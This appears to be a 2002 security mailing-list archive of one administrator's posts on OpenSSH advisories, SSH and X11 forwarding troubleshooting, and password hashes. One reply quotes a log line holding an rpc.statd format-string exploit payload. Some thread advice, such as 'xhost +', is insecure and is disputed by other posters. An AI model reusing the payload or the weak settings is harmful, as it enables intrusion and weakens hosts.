> > Blowfish because it's secure and it's the fastest cipher. AES sucks
> > because it's dog slow, and it doesn't buy you that much more security
> > than Blowfish.
> 
> I'm surprised that you say AES is slow because it has been made to be
> really fast. I'm curious to know in what conditions do you find it slow?

It didn't turn out that way. It's faster than 3DES, but not faster than
Blowfish. It was designed to be faster than 3DES, but not anything else.

It was designed to replace the old US standard, not any of the others.

> Perhaps the OpenSSH implementation is not good... 

No, it has nothing to do with the OpenSSH or SSH.com implementations.
Or any IPSec implementation for that matter. Anytime we have performance
problems, we switch to Blowfish (which isn't implemented in FreeSWAN :(
as of yet).

It makes a tremendous difference over slow lines, or anything else for
that matter.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~


pgpeTR8jk9vAF.pgp
Description: PGP signature


Re: [Fwd: ISS Advisory: OpenSSH Remote Challenge Vulnerability]

2002-06-26 Thread Anne Carasik
disabling the Challenge-Response authentication parameter within the
> OpenSSH daemon configuration file. This filename and path is typically:
> /etc/ssh/sshd_config. To disable this parameter, locate the
> corresponding line and change it to the line below:
> 
> ChallengeResponseAuthentication no
> 
> The "sshd" process must be restarted for this change to take effect.
> This workaround will permanently remove the vulnerability. X-Force
> recommends that administrators upgrade to OpenSSH version 3.4
> immediately. This version implements privilege separation, contains a
> patch to block this vulnerability, and contains many additional pro-
> active security fixes. Privilege separation was designed to limit
> exposure to known and unknown vulnerabilities. Visit
> http://www.openssh.com for more information.
> 
> Additional Information:
> 
> ISS X-Force and Black Hat consulting will host a presentation titled,
> "Professional Source Code Auditing" at Black Hat Briefings USA 2002. The
> presentation will explore advanced source code auditing techniques as
> well as secure development best-practices. Please refer to
> http://www.blackhat.com and
> http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd for
> more information.
> 
> Credits:
> 
> The vulnerability described in this advisory was discovered and
> researched by Mark Dowd of the ISS X-Force. ISS would like to thank Theo
> de Raadt of the OpenBSD Project for his assistance with this advisory.
> 
> 
> 
> __
> 
> About Internet Security Systems (ISS)
> Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
> pioneer and world leader in software and services that protect critical
> online resources from an ever-changing spectrum of threats and misuse.
> Internet Security Systems is headquartered in Atlanta, GA, with
> additional operations throughout the Americas, Asia, Australia, Europe
> and the Middle East.
> 
> Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
> worldwide.
> 
> Permission is hereby granted for the electronic redistribution of this
> document. It is not to be edited or altered in any way without the
> express written consent of the Internet Security Systems X-Force. If you
> wish to reprint the whole or any part of this document in any other
> medium excluding electronic media, please email [EMAIL PROTECTED] for
> permission.
> 
> Disclaimer: The information within this paper may change without notice.
> Use of this information constitutes acceptance for use in an AS IS
> condition. There are NO warranties, implied or otherwise, with regard to
> this information or its use. Any use of this information is at the
> user's risk. In no event shall the author/distributor (Internet Security
> Systems X-Force) be held liable for any damages whatsoever arising out
> of or in connection with the use or spread of this information.
> 
> X-Force PGP Key available on MIT's PGP key server and PGP.com's key
> server, as well as at http://www.iss.net/security_center/sensitive.php
> 
> Please send suggestions, updates, and comments to: X-Force
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: [Fwd: ISS Advisory: OpenSSH Remote Challenge Vulnerability]

2002-06-26 Thread Anne Carasik
Hi Simon,

This one time, [EMAIL PROTECTED] wrote:
> I am a bit worried about the ssh advisories, not the actual package
> itself (well, that too) but the way it was handled -- the openssh team
> issued new versions of a package and a security advisory asking
> everyone to update to the new package, Debian and others jumped on it
> and sent the new version out.  The possibility of distributing a wide
> scale worm or virus using this approach is obvious.

Always, always, check the digital signature. I don't think that
Theo and co. would want to distribute a worm in this way. This
would defeat their purpose for existence in the UNIX security
world.

I agree though.. it's really poorly handled.

I really hope that's what the deb packagers do before creating
the package.

Speaking of which..

When is Debian going to implement SHA-1 checksums or gpg sigs
into the apt-get, dpkg, and the debs before installing? This
just trusting the deb source is really scary..


> violating the social contract as well.  If the social contract was
> followed, there wouldn't be security advisories based on information
> that the community cannot verify (in this case, I understand that not
> even the security officers could verify if the ssh package was
> vulnerable or not?).  Only when someone points at the code that is
> bad, in public, and it is agreed that it is bad, only then should a
> security update be made.

Wow, this and Apache all in a matter of weeks ;-).

*sigh* I agree, especially since any monkey can go and audit the
source themselves.

> One (somewhat costly) way to solve this would be to have two kinds of
> security updates.  One is made early and with information not
> available to the community, the other is made only when the community
> can verify security bugs.  Users can decide which one they want to
> trust.

I would say use one or the other, but not both. This is something
the security community should decide, not the users. You'll confuse
the poor folks ;)

> Anyone share my concerns?  

*raises hand*

Both the Apache and OpenSSH announcements were done poorly, without
any reasonable thought given to the user community.

They should be taken out and shot ;-) (IMHO).

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: YASP (Yet Another SSH Problem)

2002-06-28 Thread Anne Carasik
Hi Andreas,

It could be a couple of things:

Ok, what are your permissions on /etc/ssh/ssh_config,
and the ~/.ssh directory?

Also, ask your ISP if they've had networking problems.

They could have also changed the sshd_config and you could
be doing DNS Name checking as well.

-Anne

This one time, Andreas Syksa wrote:
> Hello List,
> 
> I got a nasty problem after I've updated my OpenSSH to
> Version 3.3:
> 
> Right after the update everything worked fine for me.
> I could connect to the server - tested everything - fine.
> At home, with my laptop in my bed I connected last time
> and was suddenly kicked out.
> 
> I was not able to reconnect and thought: time to sleep now.
> The day after I realized: I've got a problem:
> 
> ###
> [EMAIL PROTECTED]:~> ssh -v -v 23.42.23.42 -l moeppel
> OpenSSH_3.0.2p1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f
> debug1: Reading configuration data /etc/ssh/ssh_config
> debug1: Applying options for *
> debug1: Seeding random number generator
> debug1: Rhosts Authentication disabled, originating port will not be trusted.
> debug1: restore_uid
> debug1: ssh_connect: getuid 500 geteuid 0 anon 1
> debug1: Connecting to 23.42.23.42 [23.42.23.42] port 22.
> debug1: temporarily_use_uid: 500/100 (e=0)
> debug1: restore_uid
> debug1: temporarily_use_uid: 500/100 (e=0)
> debug1: restore_uid
> debug1: Connection established.
> debug1: read PEM private key done: type DSA
> debug1: read PEM private key done: type RSA
> debug1: identity file /home/slupp/.ssh/identity type -1
> debug1: identity file /home/slupp/.ssh/id_rsa type -1
> debug1: identity file /home/slupp/.ssh/id_dsa type -1
> debug1: Remote protocol version 2.0, remote software version OpenSSH_3.3 
> Debian 1:3.3p1-0.0potato2
> debug1: match: OpenSSH_3.3 Debian 1:3.3p1-0.0potato2 pat ^OpenSSH
> Enabling compatibility mode for protocol 2.0
> debug1: Local version string SSH-2.0-OpenSSH_3.0.2p1
> debug1: SSH2_MSG_KEXINIT sent
> Connection closed by 23.42.23.42
> debug1: Calling cleanup 0x80640b0(0x0)
> ###
> 
> I've tried it with "ssh -1" as well as with "ssh -o"
> but without any success.
> As my machine is located at an ISP I've no chance
> to get to the console. A bit scary is, that it worked
> fine for several logins from Windows / Putty and
> Linux with ssh-clients below 3.3 (as seen above).
> 
> The system has all patches / new versions of software
> available installed (Apache, Bind, mod_ssl, Proftpd...)
> Any idea what might have happened?
> 
> thanks a lot,
> Andreas
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: SSH RSA Authentication

2002-06-29 Thread Anne Carasik
Hi there,

SSH.com and OpenSSH use completely different public key
formats.

Take a look at http://www.ssh.com/faq/index.cfm?id=1243
for public key interop

*notes to self that this needs to be in the Secure Shell
FAQ as well*

-Anne

This one time, Jussi Ekholm wrote:
> Dietmar Goldbeck <[EMAIL PROTECTED]> wrote:
> > On Sat, Jun 22, 2002 at 02:20:20AM -0500, Rob VanFleet wrote:
> >> On machine A, I run ssh-keygen, and generate an identity and
> >> identity.pub.  I copy identity.pub to ~/.ssh/authorized_keys on Machine
> >> B, but it still prompts for the system password, not my keyphrase.
> > 
> > It is very difficult to help you without error messages, since there
> > shouldn't be a problem.  openssh 3.0.2 and 3.2.3 play perfectly well
> > with each other.
> 
> I'm having similar problem, only difference being different SSH
> softwares between two systems. My end has OpenSSH 3.4:
> 
> OpenSSH_3.4p1 Debian 1:3.4p1-0.0woody1, SSH protocols 1.5/2.0
> 
> And the other system has:
> 
> ssh: SSH Secure Shell 3.0.1 (non-commercial version)
> 
> I'm actually quite ignorant with SSH Communications Security Corp's SSH,
> so could someone guide me a bit? I tried generating RSA key with
> 'ssh-keygen -t rsa -N ""' and copying it to this remote server to
> directory ~/.ssh/authorized_keys2. But then I noticed, that the remote
> SSH uses ~/.ssh2 and I tried to look up the FILES section of SSH2(1),
> to no avail. 
> 
> > Try generating new keys for protocol 2 with "ssh-keygen -d",
> > copy them with "ssh-copy-id" and try again.
> 
> What does option '-d' for ssh-keygen do? My ssh-keygen doesn't even know
> it; or at least '--help' doesn't show it...
> 
> - -- 
> Jussi Ekholm  --  [EMAIL PROTECTED]  --  http://erppimaa.ihku.org/

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Hi all,

I'm having a really weird problem with X11 forwarding and two 
Debian boxes. 

I can login with OpenSSH and scp and everything else no
problem.

However, when I try to launch an xterm, I get either:
can't open DISPLAY

Or the display is set to server:10.0.

I don't have this problem SSH'ing into any RH boxes.

The version I'm running on both the client and server is:
OpenSSH_3.4p1 Debian 1:3.4p1-2, SSH protocols 1.5/2.0, OpenSSL 0x0090604f

Let me know if you have any ideas. Running the client and server in both
verbose and debugging modes provides me with nothing useful :(

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
This one time, Norbert Preining wrote:
> On Mon, 01 Jul 2002, Anne Carasik wrote:
> > Let me know if you have any ideas. Running the client and server in both
> > verbose and debugging modes provides me with nothing useful :(
> Did you set 
>   X11Forwarding yes
> in both sshd_config on server and ssh_config (.ssh/config) on client?

It doesn't matter about the sshd_config, only the ssh_config on the
client. Anyway, they are both set to 

 X11Forwarding yes

The only other changes I've made are the following:

If I set X11UseLocalhost to yes on the server, I get this:

 server:/home/gator- xterm
 xterm Xt error: Can't open display: 

 server:/home/gator- echo $DISPLAY
 DISPLAY: Undefined variable.
 
If I set X11UseLocalhost to no, I get this:

 server:/home/gator- xterm
 xterm Xt error: Can't open display: 

 server:/home/gator- xterm
 xterm Xt error: Can't open display: server:10.0

So, if I force X11 with the -X (even though my ssh_config on
the client is set to X11Forwarding yes), I get this:

So, it looks like I have to have X11UseLocalhost set to no,
but I still can't open the X11.

Any ideas? Also, I did HUP the server between changes. :)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
This one time, Noah L. Meyerhans wrote:
> On Mon, Jul 01, 2002 at 01:48:31PM -0700, Anne Carasik wrote:
> > So, if I force X11 with the -X (even though my ssh_config on
> > the client is set to X11Forwarding yes), I get this:
> Get what?

Uh, the output that I included.

> You don't have UseLogin set in sshd_config, do you?

No.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
This one time, Norbert Preining wrote:
> > It doesn't matter about the sshd_config, only the ssh_config on the
> It DEFINITELY matters what is in the sshd_config on the server. The server
> makes the primary dictate on what is allowed and what is forbidden.

Well, yeah.. but you said to check the ssh_config on the client and
the server... not just the server.

Anyway, let me know if you have any ideas.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Clarifying myself.. sorry :)

So, if I force X11 with the -X (even though my ssh_config on
the client is set to X11Forwarding yes), I get the same as if
I don't run ssh with the -X option.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Hi David, 

Nope, that didn't help. It may be because X11 isn't listening on
port 6000, but I really didn't think that would affect X11 forwarding.

Guess it does.  I'll try and set my X11 to listen, and if that fixes
it, it goes in the FAQ :)

-Anne

This one time, David Caplan wrote:
> Hi, I'm not exactly sure what you are trying to do, maybe this will
> help :)
> does it matter if you authorize the other computer with xhost?
> or just a `xhost +` ?
> 
>- David
> 
> 
> > 
> > So, if I force X11 with the -X (even though my ssh_config on
> > the client is set to X11Forwarding yes), I get the same as if
> > I don't run ssh with the -X option.
> > 
> > -Anne
> 
> 
> -+-
>  // <[EMAIL PROTECTED]> // <http://david.ath.cx> 
> gpg fingerprint:: A439 6991 01CD 18F8 BF17  4E3E 7197 B014 014D 64C1
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Okay, having X11 listening for TCP connections with xhost +
enabled didn't help.

I'm open to other suggestions. :)

-Anne

This one time, Anne Carasik wrote:
> Hi David, 
> 
> Nope, that didn't help. It may be because X11 isn't listening on
> port 6000, but I really didn't think that would affect X11 forwarding.
> 
> Guess it does.  I'll try and set my X11 to listen, and if that fixes
> it, it goes in the FAQ :)
> 
> -Anne
> 
> This one time, David Caplan wrote:
> > Hi, I'm not exactly sure what you are trying to do, maybe this will
> > help :)
> > does it matter if you authorize the other computer with xhost?
> > or just a `xhost +` ?
> > 
> >- David
> > 
> > 
> > > 
> > > So, if I force X11 with the -X (even though my ssh_config on
> > > the client is set to X11Forwarding yes), I get the same as if
> > > I don't run ssh with the -X option.
> > > 
> > > -Anne
> > 
> > 
> > -+-
> >  // <[EMAIL PROTECTED]> // <http://david.ath.cx> 
> > gpg fingerprint:: A439 6991 01CD 18F8 BF17  4E3E 7197 B014 014D 64C1
> >   
> > 
> > 
> 
> -- 
>   .-"".__."``".   Anne Carasik, System Administrator
>  .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
> (O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
> ~`~~
> 



-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Hi Vineet,

It doesn't matter--it still does not work no matter what I do
to my X server.

Anyway, I turned off xhost and X11 listening a while ago.

-Anne

This one time, Vineet Kumar wrote:
> * Anne Carasik ([EMAIL PROTECTED]) [020701 16:01]:
> > This one time, David Caplan wrote:
> > > Hi, I'm not exactly sure what you are trying to do, maybe this will
> > > help :)
> > > does it matter if you authorize the other computer with xhost?
> > > or just a `xhost +` ?
> > 
> > Nope, that didn't help. It may be because X11 isn't listening on
> > port 6000, but I really didn't think that would affect X11 forwarding.
> > 
> > Guess it does.  I'll try and set my X11 to listen, and if that fixes
> > it, it goes in the FAQ :)
> 
> nonono! don't set your x server to listen for tcp and don't use xhost.
> 
> That is the Wrong Way. The whole idea of using ssh's x forwarding is to
> avoid sending your X session (including all your keystrokes) across the
> wire in the clear. (It's also rather convenient, once it's set up right,
> to locally-display remote apps, but demonstrated difficulties in getting
> it set up negate any convenience argument in this case, I think!)
> 
> For review:
> 
> http://www.google.com/search?q=never+xhost&btnI=I
> 
> good times,
> Vineet
> -- 
> http://www.doorstop.net/
> -- 
> "Computer Science is no more about computers
> than astronomy is about telescopes." -E.W. Dijkstra



-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: More SSH Fun (X11 forwarding)

2002-07-01 Thread Anne Carasik
Hi Vineet, 

I appreciate the help, but I know that setting the DISPLAY doesn't work
either. 

I need to know what DOES work, or if this is a bug.

How did you get X11 working on Debian running OpenSSH 3.4p1? Did it
just magically work for you? Did you have to set something?

-Anne

This one time, Vineet Kumar wrote:
> No, that's not right, either. If you have DISPLAY set in the environment
> of the ssh client when it connects, and the remote sshd and local ssh
> are instructed to allow it, ssh forwarding takes place. It gets set up
> by creating a virtual X server on the remote machine and setting DISPLAY
> there to that (something like remote:10.0). X clients run remotely
> connect to that virtual X server, which simply acts as a sort of proxy
> to send the X data through the ssh tunnel to the X server on the local
> machine.
> 
> So DISPLAY won't be set to the local ssh client machine. If it is, the X
> clients will be sending their data straight to the local client over the
> network, in the clear! (If the local X server is set to listen for it,
> which it shouldn't be, and isn't by default on recent debian systems.)
> 
> Once it's working, you shouldn't have to touch DISPLAY. (Except possibly
> to make sure it's set to the right thing on the LOCAL side, before the
> connection is ever attempted. That should only happen if your
> environment is whacked for some other reason, though.)
> 
> good times,
> Vineet
> -- 
> http://www.doorstop.net/
> -- 
> "Computer Science is no more about computers
> than astronomy is about telescopes." -E.W. Dijkstra



-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: error msg

2002-07-29 Thread Anne Carasik
Looks like someone's checking your system for a buffer overflow
exploit.

-Anne

This one time, Liu, GuangYu wrote:
> Hi there,
>   Anybody knows what caused the following error message:
> 
> Jul 30 13:16:35 liugy rpc.statd[298]: gethostbyname error for
> ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%1
> 37x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\2
>  20\220\220\220\220\220\220\220\220\220
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Telnet information.

2002-07-31 Thread Anne Carasik
Here's the link to the Phrack article.

http://www.phrack.org/show.php?p=59&a=11

It's a really good read, and what they are
suggesting would affect the entire implementation
of SSH, not just OpenSSH or SSH.com.

It can't be fixed from the config file, as
they are not talking about the protocols 1
or 2.

-Anne

This one time, Dale Amon wrote:
> On Wed, Jul 31, 2002 at 01:58:59PM +0200, Robert van der Meulen wrote:
> > 
> > Quoting Jay Kline ([EMAIL PROTECTED]):
> > > I may be wrong, but don't the SSH clients need that banner to be able to 
> > > identify what version to use?
> > 
> > Yes; the major/minor combination tells the client which protocol versions
> > can be used. The latest phrack has some interesting information about that
> > as well :)
> 
> But you can use the sshd_config and ssh_config to allow only the version
> you want.
> 
>  
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: CERT advisories

2002-07-31 Thread Anne Carasik
This one time, Søren Hansen wrote:
> The most recent CERT advisory is about a vulnerability in OpenSSL. At
> the end of the advisory there's a link to RedHat who already has a patch
> ready.. Does anyone know what it would take to let the Debian community
> in the loop? I suppose this might let information out in the open before
> it was intended, but it doesn't seem fair that Debian should lag behind
> because we're an open community, does it?
> 
> Or am I missing something?

You must be missing something.

$ openssl version 
OpenSSL 0.9.6e 30 Jul 2002

$ uname -a
Linux swamp 2.4.17 #1 Fri Feb 22 11:08:36 PST 2002 i686 unknown unknown 
GNU/Linux

I'm running Woody on my boxes.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Telnet information.

2002-07-31 Thread Anne Carasik
Hi there,

This one time, Dale Amon wrote:
> Perhaps, but one should always change 
> 
>   Protocol 1,2
> 
> to just
> 
>   Protocol 2
> 
> in both ssh_config and sshd_config. If someone
> only speaks P1, you really don't want to talk
> to them at all.

There's no debating that. The article doesn't refer
to that--it refers to basic functionality of Secure
Shell.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~
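
The two sshd_config settings recommended in the messages above (`ChallengeResponseAuthentication no` from the quoted ISS advisory, and `Protocol 2`) can be checked mechanically. The script below is an added example, not part of any post in this thread: its function names and the two sample files are constructed for illustration, and it assumes that an unset keyword should be reported as a failure rather than trusted to a default.

```shell
#!/bin/sh
# Added example (not from the thread): audit an sshd_config for
#   ChallengeResponseAuthentication no   (ISS advisory workaround)
#   Protocol 2                           (no SSH protocol 1)

# effective_value FILE KEYWORD
# Print the lower-cased value sshd would use for KEYWORD, or nothing if unset.
# Keywords are case-insensitive and the first occurrence wins, so a later
# duplicate line cannot override an earlier one.
effective_value() {
    awk -v want="$2" '
        BEGIN { want = tolower(want) }
        /^[ \t]*(#|$)/ { next }              # comments and blank lines
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            n = match(line, /[ \t=]/)        # keyword ends at blank or "="
            if (n == 0) next
            key = tolower(substr(line, 1, n - 1))
            val = substr(line, n)
            gsub(/^[ \t=]+|[ \t]+$/, "", val)
            if (key == "match") exit         # only audit the global section
            if (key == want) { print tolower(val); exit }
        }
    ' "$1"
}

# check_setting FILE KEYWORD EXPECTED -> prints PASS/FAIL, returns 0 or 1
check_setting() {
    got=$(effective_value "$1" "$2")
    if [ "$got" = "$3" ]; then
        echo "PASS $2 $got"
        return 0
    fi
    # Assumption of this example: an unset keyword counts as a failure,
    # because the compiled-in default depends on the OpenSSH version.
    echo "FAIL $2 ${got:-<not set>} (want: $3)"
    return 1
}

# audit_sshd_config FILE -> exit status is the number of failed checks
audit_sshd_config() {
    fails=0
    check_setting "$1" ChallengeResponseAuthentication no || fails=$((fails + 1))
    check_setting "$1" Protocol 2 || fails=$((fails + 1))
    return "$fails"
}

# Constructed sample: the commented-out "no" line does not count, and
# protocol 1 is still offered.
write_weak_sample() {
    cat > "$1" <<'EOF'
Port 22
Protocol 1,2
#ChallengeResponseAuthentication no
ChallengeResponseAuthentication yes
EOF
}

# Constructed sample: the first occurrence is "no", so the stray
# duplicate further down is ignored by sshd and by this audit.
write_hardened_sample() {
    cat > "$1" <<'EOF'
Port 22
protocol 2
ChallengeResponseAuthentication no
# stray duplicate left behind by an earlier edit:
ChallengeResponseAuthentication yes
EOF
}

# Demo on the two constructed files.
demo_dir=$(mktemp -d)
write_weak_sample "$demo_dir/weak"
write_hardened_sample "$demo_dir/hardened"
for f in weak hardened; do
    echo "== $f =="
    audit_sshd_config "$demo_dir/$f" || echo "-> $? setting(s) to fix"
done
rm -rf "$demo_dir"
```

The checks match the OpenSSH 3.x keywords discussed in the thread; point `audit_sshd_config` at a copy of /etc/ssh/sshd_config to run it on a real file.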





Re: encrypting/decrypting partitions on the fly?

2002-08-08 Thread Anne Carasik
Also, look for bestcrypt. It's at www.jetico.com.

-Anne

This one time, [EMAIL PROTECTED] wrote:
> 
> Hello!
> Anybody know of a tool like PGPDisk for Linux?
> 
> Cya  Arnd
> 
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Pgp/GPG MiM chosen ciphertext attack

2002-08-15 Thread Anne Carasik
You mean, the social engineering that they were so nice to
point out? *sigh*

No cure for stupid users.

-Anne

This one time, Dale Amon wrote:
> I presume most of you have heard about the paper
> by Jallad, Katz and Schneier?
> 
> http://www.counterpane.com/pgp-attack.html
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Converting Users from Solaris to (Debian-)Linux

2002-08-30 Thread Anne Carasik
This one time, Vincent Hanquez wrote:
> > /etc/shadow on Linux:
> > test:$1$mT.fKI5L$Fgq6C.AKbkzGfCU.RDDqj.:11929:0:9:7:-1:-1:134549020
> > 
> > /etc/shadow on Solaris:
> > test:TCs9gC4bJy8rg:11929::
> > 
> > the hashes are quite different .. ;(
> 
> you use MD5 password on your linuxbox.
> you should downgrade your crypt to normal hash password

Isn't this a security list? :) Why would anyone downgrade a hash?
All my hashes are MD5 based, and I haven't had a problem copying
password hashes out of Solaris.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Converting Users from Solaris to (Debian-)Linux

2002-08-30 Thread Anne Carasik
This one time, Jan-Hendrik Palic wrote:
> On Fri, Aug 30, 2002 at 12:04:15PM -0400, Steve Mickeler wrote:
> >Your solaris hashes aren't MD5.
> is it not possible to upgrade to MD5 on Solaris?

Would PAM for that?

I'm not sure if I made my Debian box with MD5 then.. *sigh*

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: "suspicious" apache log entries

2002-09-10 Thread Anne Carasik
Sounds like Code Red. We get a lot of these too, and
the Microsoft attacks don't do much to an Apache server :)

-Anne

This one time, Michael Renzmann wrote:
> Hi all.
> 
> While digging through the error.log of my apache I found two lines that 
> seem to hint toward a new (?) worm. I saw the first one some days ago, too:
> 
> [Sat Aug 31 21:03:49 2002] [error] [client 64.152.12.2] request failed: 
> erroneous characters after protocol string: CONNECT 
> mailb.microsoft.com:25 / HTTP/1.0
> 
> Looks like there is someone trying to abuse a proxy to connect to a SMTP 
> server?
> 
> 
> The second is a new one (which means I never saw it before). It appears 
> several times in the log, below I quoted the first appearance:
> 
> [Sat Sep  7 05:33:20 2002] [error] [client 202.224.228.106] Client sent 
> malformed Host header
> 
> Any idea what type of attack these lines give a hint about? I think 
> Apache is safe here, this most probably would be an attack against IIS 
> or something like that. But I would like to learn a little more about 
> those ones...
> 
> Bye, Mike
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik
Kill your sshd. Run it in debugging mode (it will not
fork a process):

# sshd -ddd

Open another window, now run the client in verbose mode:

$ ssh -vvv [EMAIL PROTECTED]

Then email us the output. :) Otherwise, this is really difficult
to troubleshoot.

-Anne



This one time, Alexis Sukrieh wrote:
> You're right, it was set to yes but after putting it to 'no', the same 
> problem is still there...
> 
> At 16:11 02/10/2002 +0200, you wrote:
> >You need to turn off UsePrivilegeSeparation
> >in your /etc/ssh/sshd_config file.
> >
> >"UsePrivilegeSeparation no"
> 
> 
> 
> 
> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]>
> . homepage - [http://sukria.net]
> . clef PGP - [http://sukria.net/print.php?c=privacy]
> . mydynaweb - [http://www.mydynaweb.net]
> __
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Probem with openssh and pam modules

2002-10-02 Thread Anne Carasik
